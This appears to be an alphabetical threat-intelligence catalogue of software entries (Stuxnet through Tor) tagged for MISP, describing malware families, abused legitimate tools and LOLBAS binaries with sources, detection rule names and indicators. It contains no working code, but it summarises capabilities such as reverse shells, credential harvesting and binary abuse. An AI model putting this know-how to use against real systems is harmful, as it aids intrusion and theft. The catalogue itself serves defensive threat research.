[Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.<sup>[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)]</sup><sup>[[CISA ICS Advisory ICSA-10-272-01](https://app.tidalcyber.com/references/25b3c18c-e017-4773-91dd-b489220d4fcb)]</sup><sup>[[ESET Stuxnet Under the Microscope](https://app.tidalcyber.com/references/4ec039a9-f843-42de-96ed-185c4e8c2d9f)]</sup><sup>[[Langer Stuxnet](https://app.tidalcyber.com/references/76b99581-e94d-4e51-8110-80557474048e)]</sup> [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was discovered in 2010, with some components being used as early as November 2008.<sup>[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)]</sup>

The tag is: misp-galaxy:software="Stuxnet"

S-Type

The tag is: misp-galaxy:software="S-Type"

SUGARDUMP

[SUGARDUMP](https://app.tidalcyber.com/software/6ff7bf2e-286c-4b1b-92a0-1e5322870c59) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) campaign. The first known [SUGARDUMP](https://app.tidalcyber.com/software/6ff7bf2e-286c-4b1b-92a0-1e5322870c59) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.<sup>[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]</sup>

The tag is: misp-galaxy:software="SUGARDUMP"

SUGARUSH

[SUGARUSH](https://app.tidalcyber.com/software/004c781a-3d7d-446b-9677-a042c8f6566e) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://app.tidalcyber.com/software/004c781a-3d7d-446b-9677-a042c8f6566e) was first identified during analysis of UNC3890’s [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) campaign targeting Israeli companies, which began in late 2020.<sup>[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]</sup>

The tag is: misp-galaxy:software="SUGARUSH"

Solorigate - Associated Software

<sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="Solorigate - Associated Software"

SUNBURST

[SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.<sup>[[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)]</sup><sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="SUNBURST"

SUNSPOT

[SUNSPOT](https://app.tidalcyber.com/software/66966a12-3db3-4e43-a7e8-6c6836ccd8fe) is an implant that injected the [SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.<sup>[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)]</sup>

The tag is: misp-galaxy:software="SUNSPOT"

SUPERNOVA

[SUPERNOVA](https://app.tidalcyber.com/software/f02abaee-237b-4891-bb5d-30ca86dfc2c8) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://app.tidalcyber.com/software/f02abaee-237b-4891-bb5d-30ca86dfc2c8) may have been used by the China-based threat group SPIRAL.<sup>[[Guidepoint SUPERNOVA Dec 2020](https://app.tidalcyber.com/references/78fee365-ab2b-4823-8358-46c362be1ac0)]</sup><sup>[[Unit42 SUPERNOVA Dec 2020](https://app.tidalcyber.com/references/e884d0b5-f2a2-47cb-bb77-3acdac6b1790)]</sup><sup>[[SolarWinds Advisory Dec 2020](https://app.tidalcyber.com/references/4e8b908a-bdc5-441b-bc51-98dfa87f6b7a)]</sup><sup>[[CISA Supernova Jan 2021](https://app.tidalcyber.com/references/ce300d75-8351-4d7c-b280-7d5fbe17f9bb)]</sup><sup>[[Microsoft Analyzing Solorigate Dec 2020](https://app.tidalcyber.com/references/8ad72d46-ba2c-426f-bb0d-eb47723c8e11)]</sup>

The tag is: misp-galaxy:software="SUPERNOVA"

SVCReady

[SVCReady](https://app.tidalcyber.com/software/a8110f81-5ee9-5819-91ce-3a57aa330dcb) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) activity and [SVCReady](https://app.tidalcyber.com/software/a8110f81-5ee9-5819-91ce-3a57aa330dcb) distribution, including similarities in file names, lure images, and identical grammatical errors.<sup>[[HP SVCReady Jun 2022](https://app.tidalcyber.com/references/48d5ec83-f1b9-595c-bb9a-d6d5cc513a41)]</sup>

The tag is: misp-galaxy:software="SVCReady"

Sykipot

[Sykipot](https://app.tidalcyber.com/software/ae749f9c-cf46-42ce-b0b8-f0be8660e3f3) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://app.tidalcyber.com/software/ae749f9c-cf46-42ce-b0b8-f0be8660e3f3) hijacks smart cards on victims. <sup>[[Alienvault Sykipot DOD Smart Cards](https://app.tidalcyber.com/references/1a96544f-5b4e-4e1a-8db0-a989df9e4aaa)]</sup> The group using this malware has also been referred to as Sykipot. <sup>[[Blasco 2013](https://app.tidalcyber.com/references/46be6b77-ee2b-407e-bdd4-5a1183eda7f3)]</sup>

The tag is: misp-galaxy:software="Sykipot"

SynAck

[SynAck](https://app.tidalcyber.com/software/19ae8345-745e-4872-8a29-d56c8800d626) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. <sup>[[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)]</sup> <sup>[[Kaspersky Lab SynAck May 2018](https://app.tidalcyber.com/references/bbb9bcb5-cd44-4dcb-a7e5-f6c4cf93f74f)]</sup>

The tag is: misp-galaxy:software="SynAck"

Syncappvpublishingserver.vbs - Associated Software

<sup>[[Syncappvpublishingserver.vbs - LOLBAS Project](/references/adb09226-894c-4874-a2e3-fb2c6de30173)]</sup>

The tag is: misp-galaxy:software="Syncappvpublishingserver.vbs - Associated Software"

Syncappvpublishingserver

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Script used related to app-v and publishing server

Author: Oddvar Moe

Paths: * C:\Windows\System32\SyncAppvPublishingServer.vbs

Detection: * Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml]([Syncappvpublishingserver.vbs - LOLBAS Project(/references/adb09226-894c-4874-a2e3-fb2c6de30173)]</sup>

The tag is: misp-galaxy:software="Syncappvpublishingserver"

SyncAppvPublishingServer.exe - Associated Software

<sup>[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]</sup>

The tag is: misp-galaxy:software="SyncAppvPublishingServer.exe - Associated Software"

SyncAppvPublishingServer

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by App-v to get App-v server lists

Author: Oddvar Moe

Paths: * C:\Windows\System32\SyncAppvPublishingServer.exe * C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

Detection: * Sigma: [posh_ps_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml) * Sigma: [posh_pm_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml) * Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml) * IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed<sup>[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]</sup>

The tag is: misp-galaxy:software="SyncAppvPublishingServer"

SYNful Knock

[SYNful Knock](https://app.tidalcyber.com/software/69ab291d-5066-4e47-9862-1f5c7bac7200) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim’s network and provide new capabilities to the adversary.<sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

The tag is: misp-galaxy:software="SYNful Knock"

Sys10

The tag is: misp-galaxy:software="Sys10"

SYSCON

[SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) has been delivered by the [CARROTBALL](https://app.tidalcyber.com/software/84bb4068-b441-435e-8535-02a458ffd50b) and [CARROTBAT](https://app.tidalcyber.com/software/aefa893d-fc6e-41a9-8794-2700049db9e5) droppers.<sup>[[Unit 42 CARROTBAT November 2018](https://app.tidalcyber.com/references/6986a64a-5fe6-4697-b70b-79cccaf3d730)]</sup><sup>[[Unit 42 CARROTBAT January 2020](https://app.tidalcyber.com/references/b65442ca-18ca-42e0-8be0-7c2b66c26d02)]</sup>

The tag is: misp-galaxy:software="SYSCON"

Syssetup.dll - Associated Software

<sup>[[Syssetup.dll - LOLBAS Project](/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]</sup>

The tag is: misp-galaxy:software="Syssetup.dll - Associated Software"

Syssetup

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows NT System Setup

Author: LOLBAS Team

Paths: * c:\windows\system32\syssetup.dll * c:\windows\syswow64\syssetup.dll

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Splunk: [detect_rundll32_application_control_bypass_syssetup.yml]([Syssetup.dll - LOLBAS Project(/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]</sup>

The tag is: misp-galaxy:software="Syssetup"

Coroxy - Associated Software

The tag is: misp-galaxy:software="Coroxy - Associated Software"

DroxiDat - Associated Software

The tag is: misp-galaxy:software="DroxiDat - Associated Software"

SystemBC

SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence & lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.<sup>[[BlackBerry SystemBC June 10 2021](/references/08186ff9-6ca5-4c09-b5e7-b883eb15fdba)]</sup><sup>[[Sophos SystemBC December 16 2020](/references/eca1301f-deeb-4a97-8c4e-e61210706116)]</sup><sup>[[WithSecure SystemBC May 10 2021](/references/4004e072-9e69-4e81-a2b7-840e106cf3d9)]</sup><sup>[[Trend Micro Play Ransomware September 06 2022](/references/ed02529c-920d-4a92-8e86-be1ed7083991)]</sup> According to Mandiant’s 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.<sup>[[TechRepublic M-Trends 2023](/references/1347e21e-e77d-464d-bbbe-dc4d3f2b07a1)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/systembc/

The tag is: misp-galaxy:software="SystemBC"

Systeminfo

[Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) is a Windows utility that can be used to gather detailed information about a computer. <sup>[[TechNet Systeminfo](https://app.tidalcyber.com/references/5462ba66-6e26-41c2-bc28-6c19085d4469)]</sup>

The tag is: misp-galaxy:software="Systeminfo"

HyperSSL - Associated Software

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="HyperSSL - Associated Software"

Soldier - Associated Software

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="Soldier - Associated Software"

FOCUSFJORD - Associated Software

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="FOCUSFJORD - Associated Software"

SysUpdate

[SysUpdate](https://app.tidalcyber.com/software/148d587c-3b1e-4e71-bdfb-8c37005e7e77) is a backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="SysUpdate"

T9000

[T9000](https://app.tidalcyber.com/software/c5647cc4-0d46-4a41-8591-9179737747a2) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. <sup>[[FireEye admin@338 March 2014](https://app.tidalcyber.com/references/6a37e6eb-b767-4b10-9c39-660a42b19ddd)]</sup> <sup>[[Palo Alto T9000 Feb 2016](https://app.tidalcyber.com/references/d7eefe85-86cf-4b9d-bf70-f16c5a0227cc)]</sup>

The tag is: misp-galaxy:software="T9000"

Tactical RMM

According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Tactical RMM"

Taidoor

[Taidoor](https://app.tidalcyber.com/software/9334df79-9023-44bb-bc28-16c1f07b836b) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.<sup>[[CISA MAR-10292089-1.v2 TAIDOOR August 2021](https://app.tidalcyber.com/references/0ae18fda-cc88-49f4-8e85-7b63044579ea)]</sup> [Taidoor](https://app.tidalcyber.com/software/9334df79-9023-44bb-bc28-16c1f07b836b) has primarily been used against Taiwanese government organizations since at least 2010.<sup>[[TrendMicro Taidoor](https://app.tidalcyber.com/references/3d703dfa-97c5-498f-a712-cb4995119297)]</sup>

The tag is: misp-galaxy:software="Taidoor"

Tailscale

According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that "provides virtual private networks (VPNs) to secure network communications". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Tailscale"

TAINTEDSCRIBE

[TAINTEDSCRIBE](https://app.tidalcyber.com/software/1548c94a-fb4d-43d8-9956-ea26f5cc552f) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). It was first reported in May 2020.<sup>[[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020](https://app.tidalcyber.com/references/b9946fcc-592a-4c54-b504-4fe5050704df)]</sup>

The tag is: misp-galaxy:software="TAINTEDSCRIBE"

TajMahal

[TajMahal](https://app.tidalcyber.com/software/b1b7a8d9-6df3-4e89-8622-a6eea3da729b) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://app.tidalcyber.com/software/b1b7a8d9-6df3-4e89-8622-a6eea3da729b) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup>

The tag is: misp-galaxy:software="TajMahal"

Tar.exe - Associated Software

<sup>[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]</sup>

The tag is: misp-galaxy:software="Tar.exe - Associated Software"

Tar

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to extract and create archives.

Author: Brian Lucero

Paths: * C:\Windows\System32\tar.exe

Detection: * IOC: tar.exe extracting files from a remote host within the environment<sup>[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]</sup>

The tag is: misp-galaxy:software="Tar"

Tarrask

[Tarrask](https://app.tidalcyber.com/software/7bb9d181-4405-4938-bafb-b13cc98b6cd8) is malware that has been used by [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) since at least August 2021. [Tarrask](https://app.tidalcyber.com/software/7bb9d181-4405-4938-bafb-b13cc98b6cd8) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.<sup>[[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)]</sup>

The tag is: misp-galaxy:software="Tarrask"

Tasklist

The [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. <sup>[[Microsoft Tasklist](https://app.tidalcyber.com/references/2c09561a-02ee-4948-9745-9d6c8eb2881d)]</sup>

The tag is: misp-galaxy:software="Tasklist"

tcpdump

tcpdump is an open-source network packet analyzer utility run from the command line.

The tag is: misp-galaxy:software="tcpdump"

TDSSKiller

TDSSKiller is a tool used to remove rootkits.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="TDSSKiller"

TDTESS

The tag is: misp-galaxy:software="TDTESS"

te.exe - Associated Software

<sup>[[te.exe - LOLBAS Project](/references/e7329381-319e-4dcc-8187-92882e6f2e12)]</sup>

The tag is: misp-galaxy:software="te.exe - Associated Software"

te

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).

Author: Oddvar Moe

Paths: * no default

Detection: * Sigma: [proc_creation_win_susp_use_of_te_bin.yml]([te.exe - LOLBAS Project(/references/e7329381-319e-4dcc-8187-92882e6f2e12)]</sup>

The tag is: misp-galaxy:software="te"

Teams.exe - Associated Software

<sup>[[Teams.exe - LOLBAS Project](/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]</sup>

The tag is: misp-galaxy:software="Teams.exe - Associated Software"

Teams

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Electron runtime binary which runs the Teams application

Author: Andrew Kisliakov

Paths: * %LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe

Detection: * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app directory created * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app.asar file created/modified by non-Teams installer/updater * Sigma: [proc_creation_win_susp_electron_exeuction_proxy.yml]([Teams.exe - LOLBAS Project(/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]</sup>

The tag is: misp-galaxy:software="Teams"

TeamViewer

TeamViewer is a tool used to enable remote connections to network devices for support and administration.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="TeamViewer"

TEARDROP

[TEARDROP](https://app.tidalcyber.com/software/bae20f59-469c-451c-b4ca-70a9a04a1574) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a). It was likely used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least May 2020.<sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup><sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="TEARDROP"

Teleport

Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

The tag is: misp-galaxy:software="Teleport"

TestWindowRemoteAgent.exe - Associated Software

<sup>[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]</sup>

The tag is: misp-galaxy:software="TestWindowRemoteAgent.exe - Associated Software"

TestWindowRemoteAgent

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC

Author: Onat Uzunyayla

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe

Resources: None Provided

Detection: * IOC: TestWindowRemoteAgent.exe spawning unexpectedly<sup>[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]</sup>

The tag is: misp-galaxy:software="TestWindowRemoteAgent"

TEXTMATE

[TEXTMATE](https://app.tidalcyber.com/software/49d0ae81-d51b-4534-b1e0-08371a47ef79) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) in February 2017. <sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup>

The tag is: misp-galaxy:software="TEXTMATE"

EvilQuest - Associated Software

The tag is: misp-galaxy:software="EvilQuest - Associated Software"

MacRansom.K - Associated Software

<sup>[[SentinelOne EvilQuest Ransomware Spyware 2020](https://app.tidalcyber.com/references/4dc26c77-d0ce-4836-a4cc-0490b6d7f115)]</sup>

The tag is: misp-galaxy:software="MacRansom.K - Associated Software"

ThiefQuest

[ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.<sup>[[Reed thiefquest fake ransom](https://app.tidalcyber.com/references/b265ef93-c1fb-440d-a9e0-89cf25a3de05)]</sup> Even though [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[reed thiefquest ransomware analysis](https://app.tidalcyber.com/references/47b49df4-34f1-4a89-9983-e8bc19aadf8c)]</sup>

The tag is: misp-galaxy:software="ThiefQuest"

ThreatNeedle

[ThreatNeedle](https://app.tidalcyber.com/software/b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e) is a backdoor that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08)'s Manuscrypt (a.k.a. NukeSped) malware family.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup>

The tag is: misp-galaxy:software="ThreatNeedle"

ThunderShell

ThunderShell is a tool used to facilitate remote access via HTTP requests.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="ThunderShell"

TightVNC

According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.<sup>[[TightVNC Software Project Page](/references/e1725230-4f6c-47c5-8e30-90dfb01a75d7)]</sup>

The tag is: misp-galaxy:software="TightVNC"

TinyTurla

[TinyTurla](https://app.tidalcyber.com/software/39f0371c-b755-4655-a97e-82a572f2fae4) is a backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) against targets in the US, Germany, and Afghanistan since at least 2020.<sup>[[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]</sup>

The tag is: misp-galaxy:software="TinyTurla"

TINYTYPHON

[TINYTYPHON](https://app.tidalcyber.com/software/0e009cb8-848e-427a-9581-d3a4fd9f6a87) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup>

The tag is: misp-galaxy:software="TINYTYPHON"

TinyZBot

The tag is: misp-galaxy:software="TinyZBot"

Tomiris

[Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) and [GoldMax]([Kaspersky Tomiris Sep 2021(https://app.tidalcyber.com/references/a881a7e4-a1df-4ad2-b67f-ef03caddb721)]</sup>

The tag is: misp-galaxy:software="Tomiris"

Tor

[Tor](https://app.tidalcyber.com/software/8c70d85b-b06d-423c-8bab-ecff18f332d6) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://app.tidalcyber.com/software/8c70d85b-b06d-423c-8bab-ecff18f332d6) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. <sup>[[Dingledine Tor The Second-Generation Onion Router](https://app.tidalcyber.com/references/ffb6a26d-2da9-4cce-bb2d-5280e9cc16b4)]</sup>

The tag is: misp-galaxy:software="Tor"

Torisma

